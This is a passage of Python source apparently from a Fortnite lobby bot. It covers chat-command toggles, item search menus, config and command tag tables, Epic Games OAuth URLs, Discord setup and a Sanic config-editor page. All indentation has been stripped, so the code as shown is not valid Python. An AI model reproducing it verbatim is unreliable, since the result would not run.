await reply(message, client, l('set_to', value[1], l('off')))
else:
if data['caseinsensitive']:
users = {str(user.display_name): user for user in client.party.members if content_ in jaconv.kata2hira(str(user.display_name).lower())}
else:
users = {str(user.display_name): user for user in client.party.members if content_ in str(user.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
setattr(client,value[0],user.id)
send(display_name,l('set_to', value[1], name(user)),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], name(user)))
else:
client.select[message.author.id] = {
"exec": [
"""\
setattr(client,value[0],user.id)
send(display_name,l('set_to', value[1], name(user)),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], name(user)))""" for user in users.values()
],
"variable": [
{"user": user, "value": value} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_mimic_user')}"
await reply(message, client, text)
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}] / {l('name_or_id')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
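# Plain on/off toggles; each entry maps a command to the client
# attribute it controls and the label used in replies.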
keys = {
"outfitlock": ["outfitlock", l('lock', l("outfit"))],
"backpacklock": ["backpacklock", l('lock', l("backpack"))],
"pickaxelock": ["pickaxelock", l('lock', l("pickaxe"))],
"emotelock": ["emotelock", l('lock', l("emote"))],
"whisper": ["whisper", l('command_from', l('whisper'))],
"partychat": ["partychat", l('command_from', l('partychat'))],
"discord": ["discord", l('command_from', l('discord'))],
"web": ["web", l('command_from', l('web'))],
"disablewhisperperfectly": ["whisperperfect", l('disable_perfect', l('whisper'))],
"disablepartychatperfectly": ["partychatperfect", l('disable_perfect', l('partychat'))],
"disablediscordperfectly": ["discordperfect", l('disable_perfect', l('discord'))],
"acceptinvite": ["acceptinvite", l('invite')],
"acceptfriend": ["acceptfriend", l('friend_request')],
"joinmessageenable": ["joinmessageenable", l('join_', l('message'))],
"randommessageenable": ["randommessageenable", l('join_', l('randommessage'))]
}
for key,value in keys.items():
if args[0] in commands[key]:
try:
if args[1] in commands['true']:
setattr(client,value[0],True)
send(display_name,l('set_to', value[1], l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('on')))
elif args[1] in commands['false']:
setattr(client,value[0],False)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('off')))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
if ': ' in message.content:
return
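# A bare number picks an entry from a pending client.select menu and
# runs its stored snippet via aexec() with the saved variables.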
if content.isdigit() and client.select.get(message.author.id):
try:
if int(args[0]) == 0:
await reply(message, client, l('please_enter_valid_number'))
return
exec_ = client.select[message.author.id]["exec"][int(args[0])-1]
variable = globals()
variable.update(locals())
if client.select[message.author.id].get("variable"):
variable.update(client.select[message.author.id]["variable"][int(args[0])-1])
await aexec(exec_, variable)
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('please_enter_valid_number'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
else:
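# Nothing matched a command: optionally treat the whole message as an
# item name search and offer the results as a selection menu.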
if do_itemsearch:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", content, "Item")
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", content, "Item")
if result:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]["backendType"]), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
bot_ready = True
first_boot = True
filename = 'device_auths.json'
web_text = ''
cache_users = {}
cache_items = {}
cache_banners = {}
client_name = {}
ignoretype = [
"Contrail",
"Glider",
"Wrap",
"Loading Screen",
"Music",
"Spray",
"Battle Bus"
]
clients = []
loadedclients = []
whitelist = []
whitelist_ = []
blacklist = []
blacklist_ = []
otherbotlist = []
storedlogs = []
format_pattern = re.compile(r"""\{(.*?)\}""")
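# config_tags keys encode nested config paths as strings; the web editors
# later split "['fortnite']['email']" back into ('fortnite', 'email') via
# key_.replace("'","").replace("[","").split("]").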
config_tags={
"['fortnite']": [dict],
"['fortnite']['email']": [str,"can_be_multiple"],
"['fortnite']['owner']": [str,"can_be_multiple"],
"['fortnite']['platform']": [str,"select_platform"],
"['fortnite']['outfit']": [str],
"['fortnite']['outfit_style']": [str],
"['fortnite']['backpack']": [str],
"['fortnite']['backpack_style']": [str],
"['fortnite']['pickaxe']": [str],
"['fortnite']['pickaxe_style']": [str],
"['fortnite']['emote']": [str],
"['fortnite']['playlist']": [str],
"['fortnite']['banner']": [str],
"['fortnite']['banner_color']": [str],
"['fortnite']['avatar_id']": [str],
"['fortnite']['avatar_color']": [str,"can_linebreak"],
"['fortnite']['level']": [int],
"['fortnite']['tier']": [int],
"['fortnite']['xpboost']": [int],
"['fortnite']['friendxpboost']": [int],
"['fortnite']['status']": [str],
"['fortnite']['privacy']": [str,"select_privacy"],
"['fortnite']['whisper']": [bool_,"select_bool"],
"['fortnite']['partychat']": [bool_,"select_bool"],
"['fortnite']['disablewhisperperfectly']": [bool_,"select_bool"],
"['fortnite']['disablepartychatperfectly']": [bool_,"select_bool"],
"['fortnite']['ignorebot']": [bool_,"select_bool"],
"['fortnite']['joinmessage']": [str,"can_linebreak"],
"['fortnite']['randommessage']": [str,"can_be_multiple"],
"['fortnite']['joinmessageenable']": [bool_,"select_bool"],
"['fortnite']['randommessageenable']": [bool_,"select_bool"],
"['fortnite']['joinemote']": [bool_,"select_bool"],
"['fortnite']['click_invite']": [bool_,"select_bool"],
"['fortnite']['disable_voice']": [bool_,"select_bool"],
"['fortnite']['outfitmimic']": [bool_,"select_bool"],
"['fortnite']['backpackmimic']": [bool_,"select_bool"],
"['fortnite']['pickaxemimic']": [bool_,"select_bool"],
"['fortnite']['emotemimic']": [bool_,"select_bool"],
"['fortnite']['mimic-ignorebot']": [bool_,"select_bool"],
"['fortnite']['mimic-ignoreblacklist']": [bool_,"select_bool"],
"['fortnite']['outfitlock']": [bool_,"select_bool"],
"['fortnite']['backpacklock']": [bool_,"select_bool"],
"['fortnite']['pickaxelock']": [bool_,"select_bool"],
"['fortnite']['emotelock']": [bool_,"select_bool"],
"['fortnite']['acceptinvite']": [bool_,"select_bool"],
"['fortnite']['acceptfriend']": [bool_none,"select_bool_none"],
"['fortnite']['addfriend']": [bool_,"select_bool"],
"['fortnite']['invite-ownerdecline']": [bool_,"select_bool"],
"['fortnite']['inviteinterval']": [bool_,"select_bool"],
"['fortnite']['interval']": [int],
"['fortnite']['waitinterval']": [int],
"['fortnite']['hide-user']": [bool_,"select_bool"],
"['fortnite']['hide-blacklist']": [bool_,"select_bool"],
"['fortnite']['show-owner']": [bool_,"select_bool"],
"['fortnite']['show-whitelist']": [bool_,"select_bool"],
"['fortnite']['show-bot']": [bool_,"select_bool"],
"['fortnite']['blacklist']": [str,"can_be_multiple"],
"['fortnite']['blacklist-declineinvite']": [bool_,"select_bool"],
"['fortnite']['blacklist-autoblock']": [bool_,"select_bool"],
"['fortnite']['blacklist-autokick']": [bool_,"select_bool"],
"['fortnite']['blacklist-autochatban']": [bool_,"select_bool"],
"['fortnite']['blacklist-ignorecommand']": [bool_,"select_bool"],
"['fortnite']['whitelist']": [str,"can_be_multiple"],
"['fortnite']['whitelist-allowinvite']": [bool_,"select_bool"],
"['fortnite']['whitelist-declineinvite']": [bool_,"select_bool"],
"['fortnite']['whitelist-ignorelock']": [bool_,"select_bool"],
"['fortnite']['whitelist-ownercommand']": [bool_,"select_bool"],
"['fortnite']['whitelist-ignoreng']": [bool_,"select_bool"],
"['fortnite']['invitelist']": [str,"can_be_multiple"],
"['fortnite']['otherbotlist']": [str,"can_be_multiple"],
"['discord']": [dict],
"['discord']['enabled']": [bool_,"select_bool"],
"['discord']['token']": [str],
"['discord']['owner']": [int,"can_be_multiple"],
"['discord']['channels']": [str,"can_be_multiple"],
"['discord']['status']": [str],
"['discord']['status_type']": [str,"select_status"],
"['discord']['discord']": [bool_,"select_bool"],
"['discord']['disablediscordperfectly']": [bool_,"select_bool"],
"['discord']['ignorebot']": [bool_,"select_bool"],
"['discord']['blacklist']": [str,"can_be_multiple"],
"['discord']['blacklist-ignorecommand']": [bool_,"select_bool"],
"['discord']['whitelist']": [str,"can_be_multiple"],
"['discord']['whitelist-ignorelock']": [bool_,"select_bool"],
"['discord']['whitelist-ownercommand']": [bool_,"select_bool"],
"['discord']['whitelist-ignoreng']": [bool_,"select_bool"],
"['web']": [dict],
"['web']['enabled']": [bool_,"select_bool"],
"['web']['ip']": [str],
"['web']['port']": [int],
"['web']['password']": [str],
"['web']['login_required']": [bool_,"select_bool"],
"['web']['web']": [bool_,"select_bool"],
"['web']['log']": [bool_,"select_bool"],
"['replies-matchmethod']": [str,"select_matchmethod"],
"['ng-words']": [str,"can_be_multiple"],
"['ng-word-matchmethod']": [str,"select_matchmethod"],
"['ng-word-kick']": [bool_,"select_bool"],
"['ng-word-chatban']": [bool_,"select_bool"],
"['ng-word-blacklist']": [bool_,"select_bool"],
"['restart_in']": [int],
"['search_max']": [int],
"['lang']": [str,"select_lang"],
"['search-lang']": [str,"select_ben_lang"],
"['sub-search-lang']": [str,"select_ben_lang"],
"['no-logs']": [bool_,"select_bool"],
"['ingame-error']": [bool_,"select_bool"],
"['discord-log']": [bool_,"select_bool"],
"['omit-over2000']": [bool_,"select_bool"],
"['skip-if-overflow']": [bool_,"select_bool"],
"['hide-email']": [bool_,"select_bool"],
"['hide-token']": [bool_,"select_bool"],
"['hide-webhook']": [bool_,"select_bool"],
"['webhook']": [str],
"['caseinsensitive']": [bool_,"select_bool"],
"['loglevel']": [str,"select_loglevel"],
"['debug']": [bool_,"select_bool"]
}
config_tags_raw = copy.deepcopy(config_tags)
commands_tags={
"['usercommands']": [str,"can_be_multiple"],
"['true']": [str,"can_be_multiple"],
"['false']": [str,"can_be_multiple"],
"['me']": [str,"can_be_multiple"],
"['prev']": [str,"can_be_multiple"],
"['eval']": [str,"can_be_multiple"],
"['exec']": [str,"can_be_multiple"],
"['restart']": [str,"can_be_multiple"],
"['relogin']": [str,"can_be_multiple"],
"['reload']": [str,"can_be_multiple"],
"['addblacklist']": [str,"can_be_multiple"],
"['removeblacklist']": [str,"can_be_multiple"],
"['addwhitelist']": [str,"can_be_multiple"],
"['removewhitelist']": [str,"can_be_multiple"],
"['addblacklist_discord']": [str,"can_be_multiple"],
"['removeblacklist_discord']": [str,"can_be_multiple"],
"['addwhitelist_discord']": [str,"can_be_multiple"],
"['removewhitelist_discord']": [str,"can_be_multiple"],
"['addinvitelist']": [str,"can_be_multiple"],
"['removeinvitelist']": [str,"can_be_multiple"],
"['get']": [str,"can_be_multiple"],
"['friendcount']": [str,"can_be_multiple"],
"['pendingcount']": [str,"can_be_multiple"],
"['blockcount']": [str,"can_be_multiple"],
"['friendlist']": [str,"can_be_multiple"],
"['pendinglist']": [str,"can_be_multiple"],
"['blocklist']": [str,"can_be_multiple"],
"['outfitmimic']": [str,"can_be_multiple"],
"['backpackmimic']": [str,"can_be_multiple"],
"['pickaxemimic']": [str,"can_be_multiple"],
"['emotemimic']": [str,"can_be_multiple"],
"['whisper']": [str,"can_be_multiple"],
"['partychat']": [str,"can_be_multiple"],
"['discord']": [str,"can_be_multiple"],
"['web']": [str,"can_be_multiple"],
"['disablewhisperperfectly']": [str,"can_be_multiple"],
"['disablepartychatperfectly']": [str,"can_be_multiple"],
"['disablediscordperfectly']": [str,"can_be_multiple"],
"['acceptinvite']": [str,"can_be_multiple"],
"['acceptfriend']": [str,"can_be_multiple"],
"['joinmessageenable']": [str,"can_be_multiple"],
"['randommessageenable']": [str,"can_be_multiple"],
"['wait']": [str,"can_be_multiple"],
"['join']": [str,"can_be_multiple"],
"['joinid']": [str,"can_be_multiple"],
"['leave']": [str,"can_be_multiple"],
"['invite']": [str,"can_be_multiple"],
"['inviteall']": [str,"can_be_multiple"],
"['message']": [str,"can_be_multiple"],
"['partymessage']": [str,"can_be_multiple"],
"['sendall']": [str,"can_be_multiple"],
"['status']": [str,"can_be_multiple"],
"['avatar']": [str,"can_be_multiple"],
"['banner']": [str,"can_be_multiple"],
"['level']": [str,"can_be_multiple"],
"['bp']": [str,"can_be_multiple"],
"['privacy']": [str,"can_be_multiple"],
"['privacy_public']": [str,"can_be_multiple"],
"['privacy_friends_allow_friends_of_friends']": [str,"can_be_multiple"],
"['privacy_friends']": [str,"can_be_multiple"],
"['privacy_private_allow_friends_of_friends']": [str,"can_be_multiple"],
"['privacy_private']": [str,"can_be_multiple"],
"['getuser']": [str,"can_be_multiple"],
"['getfriend']": [str,"can_be_multiple"],
"['getpending']": [str,"can_be_multiple"],
"['getblock']": [str,"can_be_multiple"],
"['info']": [str,"can_be_multiple"],
"['info_party']": [str,"can_be_multiple"],
"['pending']": [str,"can_be_multiple"],
"['removepending']": [str,"can_be_multiple"],
"['addfriend']": [str,"can_be_multiple"],
"['removefriend']": [str,"can_be_multiple"],
"['removeallfriend']": [str,"can_be_multiple"],
"['remove_offline_for']": [str,"can_be_multiple"],
"['acceptpending']": [str,"can_be_multiple"],
"['declinepending']": [str,"can_be_multiple"],
"['blockfriend']": [str,"can_be_multiple"],
"['unblockfriend']": [str,"can_be_multiple"],
"['voice']": [str,"can_be_multiple"],
"['chatban']": [str,"can_be_multiple"],
"['promote']": [str,"can_be_multiple"],
"['kick']": [str,"can_be_multiple"],
"['hide']": [str,"can_be_multiple"],
"['show']": [str,"can_be_multiple"],
"['ready']": [str,"can_be_multiple"],
"['unready']": [str,"can_be_multiple"],
"['sitout']": [str,"can_be_multiple"],
"['match']": [str,"can_be_multiple"],
"['unmatch']": [str,"can_be_multiple"],
"['swap']": [str,"can_be_multiple"],
"['outfitlock']": [str,"can_be_multiple"],
"['backpacklock']": [str,"can_be_multiple"],
"['pickaxelock']": [str,"can_be_multiple"],
"['emotelock']": [str,"can_be_multiple"],
"['stop']": [str,"can_be_multiple"],
"['addeditems']": [str,"can_be_multiple"],
"['shopitems']": [str,"can_be_multiple"],
"['alloutfit']": [str,"can_be_multiple"],
"['allbackpack']": [str,"can_be_multiple"],
"['allpet']": [str,"can_be_multiple"],
"['allpickaxe']": [str,"can_be_multiple"],
"['allemote']": [str,"can_be_multiple"],
"['allemoji']": [str,"can_be_multiple"],
"['alltoy']": [str,"can_be_multiple"],
"['cid']": [str,"can_be_multiple"],
"['bid']": [str,"can_be_multiple"],
"['petcarrier']": [str,"can_be_multiple"],
"['pickaxe_id']": [str,"can_be_multiple"],
"['eid']": [str,"can_be_multiple"],
"['emoji_id']": [str,"can_be_multiple"],
"['toy_id']": [str,"can_be_multiple"],
"['id']": [str,"can_be_multiple"],
"['outfit']": [str,"can_be_multiple"],
"['backpack']": [str,"can_be_multiple"],
"['pet']": [str,"can_be_multiple"],
"['pickaxe']": [str,"can_be_multiple"],
"['emote']": [str,"can_be_multiple"],
"['emoji']": [str,"can_be_multiple"],
"['toy']": [str,"can_be_multiple"],
"['item']": [str,"can_be_multiple"],
"['set']": [str,"can_be_multiple"],
"['setvariant']": [str,"can_be_multiple"],
"['addvariant']": [str,"can_be_multiple"],
"['setstyle']": [str,"can_be_multiple"],
"['addstyle']": [str,"can_be_multiple"],
"['setenlightenment']": [str,"can_be_multiple"]
}
error_config = []
error_commands = []
outfit_keys = ("cid", "outfit", "outfitmimic", "outfitlock", "alloutfit")
backpack_keys = ("bid", "backpack", "backpackmimic", "backpacklock", "allbackpack")
pet_keys = ("petcarrier", "pet", "allpet")
pickaxe_keys = ("pickaxe_id", "pickaxe", "pickaxemimic", "pickaxelock", "allpickaxe")
emote_keys = ("eid", "emote", "emotemimic", "emotelock", "allemote")
emoji_keys = ("emoji_id", "emoji", "allemoji")
toy_keys = ("toy_id", "toy", "alltoy")
item_keys = ("id", "item")
app = Sanic(__name__)
app.secret_key = os.urandom(32)
app.static('/images', './templates/images')
env = Environment(loader=FileSystemLoader('./templates', encoding='utf8'), extensions=['jinja2.ext.do'])
auth = LoginManager()
fortnitepy_auth = fortnitepy.Auth()
launcher_token = fortnitepy_auth.ios_token
fortnite_token = fortnitepy_auth.fortnite_token
oauth_url = "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token"
fortnite_token_url = "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token"
exchange_auth_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/token"
device_auth_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/deviceAuthorization"
exchange_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/exchange"
user_lookup_url = "https://account-public-service-prod.ol.epicgames.com/account/api/public/account/{user_id}"
if not load_config():
sys.exit(1)
if error_config or error_commands:
bot_ready = False
for key in error_config:
config_tags[key].append("fix_required")
for key in error_commands:
commands_tags[key].append("fix_required")
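# Keys tagged "fix_required" make the web editors refuse to save until the
# offending field is changed (see the FixRequired checks in the form handlers).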
search_max = data["search_max"]
if data['debug']:
logger = logging.getLogger('fortnitepy.auth')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[36m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
logger = logging.getLogger('fortnitepy.http')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[36m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
logger = logging.getLogger('fortnitepy.xmpp')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[35m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
if os.getcwd().startswith('/app') or os.getcwd().startswith('/home/runner'):
data['web']['ip'] = "0.0.0.0"
else:
data['web']['ip'] = data['web']['ip'].format(ip=socket.gethostbyname(socket.gethostname()))
if True:
send(l('bot'),f'{l("lobbybot")}: gomashio\n{l("credit")}\n{l("library")}: Terbau',cyan)
text = ""
if data['loglevel'] == 'normal':
text += f'\n{l("loglevel")}: {l("normal")}\n'
elif data['loglevel'] == 'info':
text += f'\n{l("loglevel")}: {l("info")}\n'
elif data['loglevel'] == 'debug':
text += f'\n{l("loglevel")}: {l("debug")}\n'
if data.get('debug',False) is True:
text += f'\n{l("debug")}: {l("on")}\n'
else:
text += f'\n{l("debug")}: {l("off")}\n'
text += f'\nPython {platform.python_version()}\n'
text += f'fortnitepy {fortnitepy.__version__}\n'
text += f'discord.py {discord.__version__}\n'
text += f'Sanic {sanic.__version__}\n'
send(l('bot'),text,green)
if data.get('debug',False) is True:
send(l('bot'),f'[{now()}] {l("debug_is_on")}',red)
send(l('bot'),l("booting"))
dclient = discord.Client()
dclient.owner = []
dclient.isready = False
dclient.boot_time = None
if True: #discord
@dclient.event
async def on_ready() -> None:
loop = asyncio.get_event_loop()
dclient.boot_time = time.time()
dclient_user = name(dclient.user)
send(dclient_user,f"{l('login')}: {dclient_user}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
dclient.isready = True
loop.create_task(status_loop())
dclient.owner = []
for owner in data['discord']['owner']:
user = dclient.get_user(owner)
if not user:
try:
user = await dclient.fetch_user(owner)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l('error_while_requesting_userinfo'),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(dclient_user,l('discord_owner_notfound',owner),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
else:
dclient.owner.append(user)
send(dclient_user,f"{l('owner')}: {name(user)}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
lists = {
"blacklist_": "blacklist",
"whitelist_": "whitelist"
}
async def _(listuser: str) -> None:
listuser = int(listuser)
user = dclient.get_user(listuser)
if not user:
try:
user = await dclient.fetch_user(listuser)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l(f'discord_{data_}_user_notfound', listuser),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
return
globals()[list_].append(user.id)
for list_,data_ in lists.items():
await asyncio.gather(*[_(listuser) for listuser in data['discord'][data_]])
if data['loglevel'] == "debug":
send(dclient_user,f"discord {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
@dclient.event
async def on_message(message: discord.Message) -> None:
await process_command(message)
async def change_status() -> None:
var = defaultdict(lambda: None)
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"guild_count": len(dclient.guilds),
"get_guild_member_count": get_guild_member_count,
"boot_time": int(time.time() - dclient.boot_time)
}
)
activity = discord.Activity(name=eval_format(data['discord']['status'],var),type=data['discord']['status_type'])
await dclient.change_presence(activity=activity)
async def status_loop() -> None:
while True:
try:
await change_status()
except Exception:
send(dclient.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(30)
select_bool = select(
[
{"value": "True","display_value": l('bool_true')},
{"value": "False","display_value": l('bool_false')}
]
)
select_bool_none = select(
[
{"value": "True","display_value": l('bool_true')},
{"value": "False","display_value": l('bool_false')},
{"value": "None","display_value": l('bool_none')}
]
)
select_platform = select(
[
{"value": "WIN","display_value": "Windows"},
{"value": "MAC","display_value": "Mac"},
{"value": "PSN","display_value": "PlayStation"},
{"value": "XBL","display_value": "Xbox"},
{"value": "SWT","display_value": "Switch"},
{"value": "IOS","display_value": "IOS"},
{"value": "AND","display_value": "Android"}
]
)
select_privacy = select(
[
{"value": i,"display_value": l(i)} for i in ["public","friends_allow_friends_of_friends","friends","private_allow_friends_of_friends","private"]
]
)
select_status = select(
[
{"value": i,"display_value": l(i)} for i in ["playing","listening","watching"]
]
)
select_matchmethod = select(
[
{"value": i,"display_value": l(i)} for i in ["full","contains","starts","ends"]
]
)
select_loglevel = select(
[
{"value": "normal","display_value": l('normal')},
{"value": "info","display_value": l('info')},
{"value": "debug","display_value": l('debug')}
]
)
select_lang = select(
[
{"value": re.sub(r"lang(\\|/)","",i).replace(".json",""),"display_value": re.sub(r"lang(\\|/)","",i).replace(".json","")} for i in glob("lang/*.json") if "_old.json" not in i
]
)
select_ben_lang = select(
[
{"value": i,"display_value": i} for i in ["ar","de","en","es","es-419","fr","it","ja","ko","pl","pt-BR","ru","tr","zh-CN","zh-Hant"]
]
)
converter = {
"can_be_multiple": CanBeMultiple,
"can_linebreak": CanLinebreak,
"select_bool": select_bool,
"select_bool_none": select_bool_none,
"select_platform": select_platform,
"select_privacy" :select_privacy,
"select_status": select_status,
"select_loglevel": select_loglevel,
"select_lang": select_lang,
"select_ben_lang": select_ben_lang,
"select_matchmethod": select_matchmethod,
"red": Red,
"fix_required": FixRequired
}
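# Swap the string tag names gathered above for their marker classes and
# select objects so the templates and form handlers can test "X in tags".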
for key,value in config_tags.items():
for count,tag in enumerate(value):
config_tags[key][count] = converter.get(tag,tag)
for key,value in commands_tags.items():
for count,tag in enumerate(value):
commands_tags[key][count] = converter.get(tag,tag)
if True: #Web
@app.route("/favicon.ico", methods=["GET"])
async def favicon(request: Request):
return sanic.response.redirect("/images/icon.png")
if os.environ.get("FORTNITE_LOBBYBOT_STATUS") == "-1":
@app.route("/", methods=["GET"])
async def main(request: Request):
return sanic.response.html(
"<h2>Fortnite-LobbyBot<h2>"
"<p>初めに<a href='https://github.com/gomashio1596/Fortnite-LobbyBot/blob/master/README.md' target='_blank'>README</a>をお読みください</p>"
"<p>First, please read <a href='https://github.com/gomashio1596/Fortnite-LobbyBot/blob/master/README_EN.md' target='_blank'>README<a/></p>"
"<p>質問などは私(Twitter @gomashio1596 Discord gomashio#4335)か<a href='https://discord.gg/NEnka5N' target='_blank'>Discordサーバー</a>まで</p>"
"<p>For questions, Contact to me(Twitter @gomashio1596 Discord gomashio#4335) or ask in <a href='https://discord.gg/NEnka5N' target='_blank'>Discord server</a></p>"
"<p><a href='https://glitch.com/edit/#!/remix/fortnite-lobbybot' target='_blank'>ここをクリック</a>してRemix</p>"
"<p><a href='https://glitch.com/edit/#!/remix/fortnite-lobbybot' target='_blank'>Click here</a> to Remix</p>"
"<a href='https://discord.gg/NEnka5N' target='_blank'><img src='https://discordapp.com/api/guilds/718709023427526697/widget.png?style=banner1'></img></a>"
)
elif data["status"] == 0:
@app.route("/", methods=["GET", "POST"])
async def main(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("config.json")
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
flag = False
raw = request.form
data = load_json("config.json")
corrected = data
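# Walk every tagged config path: nest == 1 is a top-level key,
# nest == 2 is a key inside a section dict such as ['fortnite'] or ['web'].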
for key_,tags in config_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key] = re.split(r'\r\n|\n',value) if value else []
elif int in tags:
corrected[key] = [int(i) for i in re.split(r'\r\n|\n',value)] if value else []
elif str in tags:
corrected[key] = value.replace(r"\\n",r"\n").replace(r"\n","\n") if value else ""
elif int in tags:
corrected[key] = int(value) if value else 0
elif bool_ in tags:
corrected[key] = bool_.create(value)
elif bool_none in tags:
corrected[key] = bool_none.create(value)
elif nest == 2:
key2 = keys[1]
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
if not corrected[key].get(key2):
corrected[key][key2] = {}
else:
value2 = raw.get(f"['{key}']['{key2}']")
if FixRequired in tags and value2 == corrected.get(key,{}).get(key2):
flash_messages_red.append(l('this_field_fix_required', f"{key}: {key2}"))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key][key2] = re.split(r'\r\n|\n',value2) if value2 else []
elif int in tags:
corrected[key][key2] = [int(i) for i in re.split(r'\r\n|\n',value2)] if value2 else []
elif str in tags:
corrected[key][key2] = value2.replace(r"\\n",r"\n").replace(r"\n","\n") if value2 else ""
elif int in tags:
corrected[key][key2] = int(value2) if value2 else 0
elif bool_ in tags:
corrected[key][key2] = bool_.create(value2)
elif bool_none in tags:
corrected[key][key2] = bool_none.create(value2)
if flag:
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
corrected["status"] = 1
with open('config.json', 'w', encoding='utf-8') as f:
